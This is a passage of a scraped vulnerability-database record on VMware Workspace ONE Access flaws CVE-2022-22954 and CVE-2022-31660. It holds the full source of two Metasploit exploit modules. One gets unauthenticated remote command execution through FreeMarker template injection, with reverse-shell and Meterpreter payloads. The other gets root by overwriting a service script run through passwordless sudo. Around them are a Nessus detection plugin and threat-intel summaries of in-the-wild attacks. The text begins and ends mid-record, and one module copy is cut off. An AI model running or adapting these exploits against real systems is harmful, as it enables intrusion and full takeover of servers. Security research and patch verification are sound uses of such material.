"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-03T00:00:00", "type": "packetstorm", "title": "VMware Workspace ONE Access Template Injection / Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-03T00:00:00", "id": "PACKETSTORM:166935", "href": "https://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware Workspace ONE Access CVE-2022-22954', \n'Description' => %q{ \nThis module exploits CVE-2022-22954, an unauthenticated server-side \ntemplate injection (SSTI) in VMware Workspace ONE Access, to execute \nshell commands as the \"horizon\" user. 
\n}, \n'Author' => [ \n'mr_me', # Discovery \n'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC \n'wvu' # Exploit and independent analysis \n], \n'References' => [ \n['CVE', '2022-22954'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'], \n['URL', 'https://srcincite.io/advisories/src-2022-0005/'], \n['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'], \n['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis'] \n# More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433 \n], \n'DisclosureDate' => '2022-04-06', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\") \n \nreturn CheckCode::Unknown unless ret \nreturn CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/) \n \nCheckCode::Vulnerable \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nbash_cmd = \"bash -c 
{eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\" \n \nvprint_status(\"Executing command: #{bash_cmd}\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, ssti_uri), \n'vhost' => rand_text_alphanumeric(8..16), \n'vars_get' => { \n%w[code error].sample => rand_text_alphanumeric(8..16), \n# https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html \nssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")}) \n} \n}, 3.5) \n \nreturn unless res \nreturn '' unless res.code == 400 && res.body.include?('auth.context.invalid') \n \nres.body \nend \n \ndef ssti_uri \n%w[ \n/catalog-portal/hub-ui \n/catalog-portal/hub-ui/byob \n/catalog-portal/ui \n/catalog-portal/ui/oauth/verify \n].sample \nend \n \ndef ssti_param \n%w[deviceType deviceUdid].sample \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166935/vmware_workspace_one_access_cve_2022_22954.rb.txt"}], "zdt": [{"lastseen": "2022-08-11T22:17:52", "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. 
The service control is permitted via the sudo configuration without a password.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T00:00:00", "type": "zdt", "title": "VMware Workspace ONE Access Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-05T00:00:00", "id": "1337DAY-ID-37891", "href": "https://0day.today/exploit/description/37891", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. 
The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original 
file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": "https://0day.today/exploit/37891", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-04T14:53:02", "description": "This Metasploit module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) vulnerability in VMware Workspace ONE Access, to execute shell commands as the horizon user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T00:00:00", "type": "zdt", "title": "VMware Workspace ONE Access Template Injection / Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-04T00:00:00", "id": "1337DAY-ID-37684", "href": "https://0day.today/exploit/description/37684", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware Workspace ONE Access CVE-2022-22954',\n 'Description' => %q{\n This module exploits CVE-2022-22954, an unauthenticated server-side\n template injection (SSTI) in VMware Workspace ONE Access, to execute\n shell commands as the \"horizon\" user.\n },\n 'Author' => [\n 'mr_me', # Discovery\n 'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) 
},\n\n { 'min_version':'19.03.0.1', 'max_version':'19.03.0.1.99999999', 'fixed_display':'19.03.0.1 with HW-160130' },\n \n { 'min_version':'21.08.0.0.0', 'max_version':'21.08.0.0.99999999', 'fixed_display':'21.08.0.0 with HW-160130' },\n { 'min_version':'21.08.0.1', 'max_version':'21.08.0.1.99999999', 'fixed_display':'21.08.0.1 with HW-160130' }\n];\n\nvcf::vmware_workspace_one_access::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, expected_patch:patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-26T18:40:36", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by the following vulnerabilities:\n\n - Server-side Template Injection Remote Code Execution Vulnerability (CVE-2022-22954)\n - OAuth2 ACS Authentication Bypass Vulnerabilities (CVE-2022-22955, CVE-2022-22956)\n - JDBC Injection Remote Code Execution Vulnerabilities (CVE-2022-22957, CVE-2022-22958)\n - Cross Site Request Forgery Vulnerability (CVE-2022-22959)\n - Local Privilege Escalation Vulnerability (CVE-2022-22960)\n - Information Disclosure Vulnerability (CVE-2022-22961)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0011)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961"], "modified": "2023-01-26T00:00:00", "cpe": ["cpe:/a:vmware:workspace_one_access", "cpe:/a:vmware:identity_manager"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0011.NASL", "href": "https://www.tenable.com/plugins/nessus/159548", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159548);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/26\");\n\n script_cve_id(\n \"CVE-2022-22954\",\n \"CVE-2022-22955\",\n \"CVE-2022-22956\",\n \"CVE-2022-22957\",\n \"CVE-2022-22958\",\n \"CVE-2022-22959\",\n \"CVE-2022-22960\",\n \"CVE-2022-22961\"\n );\n script_xref(name:\"VMSA\", value:\"2022-0011\");\n script_xref(name:\"IAVA\", value:\"2022-A-0136-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/05\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0012\");\n\n script_name(english:\"VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0011)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware 
Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby the following vulnerabilities:\n\n - Server-side Template Injection Remote Code Execution Vulnerability (CVE-2022-22954)\n - OAuth2 ACS Authentication Bypass Vulnerabilities (CVE-2022-22955, CVE-2022-22956)\n - JDBC Injection Remote Code Execution Vulnerabilities (CVE-2022-22957, CVE-2022-22958)\n - Cross Site Request Forgery Vulnerability (CVE-2022-22959)\n - Local Privilege Escalation Vulnerability (CVE-2022-22960)\n - Information Disclosure Vulnerability (CVE-2022-22961)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0011.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/88099\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-154129 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2022-0011 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22954\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22956\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware Workspace ONE Access CVE-2022-22954');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'VMware Workspace ONE Access';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nvar port = get_http_port(default:80);\n\nvar app_info = vcf::vmware_workspace_one_access::get_app_info(port:port);\n\n# 3.3.[3456] don't have fixed builds, so audit out unless we are doing a paranoid scan\nif (app_info.version =~ \"3\\.3\\.[3456]\\.\" && report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'min_version':'3.3.3.0.0', 'fixed_version':'3.3.4.0.0', 'fixed_display':'3.3.3 with HW-154129' },\n { 'min_version':'3.3.4.0.0', 'fixed_version':'3.3.5.0.0', 'fixed_display':'3.3.4 with HW-154129' },\n { 'min_version':'3.3.5.0.0', 'fixed_version':'3.3.6.0.0', 'fixed_display':'3.3.5 with HW-154129' },\n { 'min_version':'3.3.6.0.0', 'fixed_version':'3.3.7.0.0', 'fixed_display':'3.3.6 with HW-154129' },\n\n { 'min_version':'20.10.0.0', 
'fixed_version':'20.10.0.0.19540061', 'fixed_display':'20.10.0.0 Build 19540061 (HW-154129)' },\n { 'min_version':'20.10.0.1', 'fixed_version':'20.10.0.1.19540061', 'fixed_display':'20.10.0.1 Build 19540061 (HW-154129)' },\n { 'min_version':'21.08.0.0', 'fixed_version':'21.08.0.0.19539711', 'fixed_display':'21.08.0.0 Build 19539711 (HW-154129)' },\n { 'min_version':'21.08.0.1', 'fixed_version':'21.08.0.1.19539711', 'fixed_display':'21.08.0.1 Build 19539711 (HW-154129)' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-05-09T13:46:51", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here An Iranian cyber espionage gang known as Rocket Kitten has begun delivering the Core Impact penetration testing tool on susceptible computers by exploiting a newly fixed severe vulnerability in VMware Workspace ONE Access/Identity Manager program. Threat actors use the VMWare Identity Manager Service flaw (CVE-2022-22954) to acquire initial access to a target system, then install a PowerShell stager to download the next stage payload, nicknamed PowerTrash Loader. The PowerTrash Loader is a 40,000-line PowerShell script that has been substantially obfuscated. PowerTrash Downloader introduces the penetration testing framework Core Impact to memory at the end of the attack chain. 
The MITRE ATT&CK TTPs commonly used by Rocket Kitten are: TA0001: Initial Access TA0002: Execution TA0006: Credential Access TA0009: Collection TA0011: Command and Control T1059 - Command and Scripting Interpreter T1189 - Drive-by Compromise T1555.003: Credentials from Password Stores: Credentials from Web Browsers T1105: Ingress Tool Transfer T1056.001: Input Capture: Keylogging T1566.001: Phishing: Spearphishing Attachment T1566.003: Phishing: Spearphishing via Service T1204.002: User Execution: Malicious File Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patch Links https://www.vmware.com/security/advisories/VMSA-2022-0011.html References https://blog.morphisec.com/vmware-identity-manager-attack-backdoor", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T12:44:24", "type": "hivepro", "title": "Newly patched VMware vulnerability exploited by Iranian espionage group, Rocket Kitten", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-26T12:44:24", "id": "HIVEPRO:8AB9E397F60C70B7C96C5D3CDA945A77", "href": 
"https://www.hivepro.com/newly-patched-vmware-vulnerability-exploited-by-iranian-espionage-group-rocket-kitten/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T19:32:38", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Multiple vulnerabilities have been discovered in VMware products. Two of these have been exploited in the wild. The first zero-day vulnerability, CVE-2022-22954, is a server-side template injection flaw. An attacker could exploit this bug to gain network access and remotely execute code in order to deliver cryptominers. Several Proof of Concepts (PoCs) of this issue indicate that it could be weaponized by ransomware/threat actor groups soon. The second zero-day vulnerability, CVE-2022-22960, exists due to improper permissions in support scripts. An attacker could exploit this issue to escalate privileges to root on vulnerable servers. Organizations are advised to patch all these vulnerabilities as soon as possible to avoid exploitation. 
Potential MITRE ATT&CK TTPs are: TA0042: Resource Development TA0001: Initial Access TA0004: Privilege Escalation T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities T1190: Exploit Public-Facing Application T1548: Abuse Elevation Control Mechanism T1068: Exploitation for Privilege Escalation Vulnerability Detail Patch Links https://kb.vmware.com/s/article/88099 References https://www.vmware.com/security/advisories/VMSA-2022-0011.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-18T13:06:29", "type": "hivepro", "title": "Two actively exploited vulnerabilities affect multiple VMware products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-18T13:06:29", "id": "HIVEPRO:850B279759C02AA5967698B7B141C8C2", "href": "https://www.hivepro.com/two-actively-exploited-vulnerabilities-affect-multiple-vmware-products/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T03:41:41", "description": "Threat Level Vulnerability Report For a detailed advisory, download the pdf file here 
Summary The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to organizations about malicious actors using CVE-2022-22954 and CVE-2022-22960. This alert was published following the disclosure of two related vulnerabilities (CVE-2022-22972 and CVE-2022-22973), leaving it vulnerable to future exploitation. All these flaws might be exploited separately or in combination to obtain total control.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T14:34:51", "type": "hivepro", "title": "Vulnerabilities in VMware when chained together grants Full System Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T14:34:51", "id": "HIVEPRO:4FB5DD5F7C41E3797518D866E88BFA8C", "href": "https://www.hivepro.com/vulnerabilities-in-vmware-when-chained-together-grants-full-system-control/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-21T07:30:07", "description": "For a detailed threat digest, download the pdf file here Published 
Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 765 14 1 2 6 25 The third week of April 2022 witnessed a huge spike in the discovery of 765 vulnerabilities, out of which 14 gained the attention of Threat Actors and security researchers worldwide. Among these 14, there were 5 zero-days, 9 are undergoing analysis and 2 other vulnerabilities about which the National Vulnerability Database (NVD) is awaiting analysis, while 1 was not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. Further, we also observed a Threat Actor group being highly active in the last week. OldGremlin, a Russian threat actor group popular for financial crime and gain, was observed targeting Russian agencies. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-24521* CVE-2022-26904* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 CVE-2022-1364* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2022-22954* CVE-2022-22955 CVE-2022-22956 CVE-2022-22957 CVE-2022-22958 CVE-2022-22959 CVE-2022-22960* CVE-2022-22961 https://kb.vmware.com/s/article/88099 CVE-2018-6882 https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7 CVE-2022-25165 CVE-2022-25166 https://aws.amazon.com/vpn/client-vpn-download/ *zero-day vulnerability Active Actors: Icon Name Origin Motive OldGremlin Russia Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0011: Command and Control T1592: Gather Victim Host Information T1583: Acquire Infrastructure T1190: Exploit 
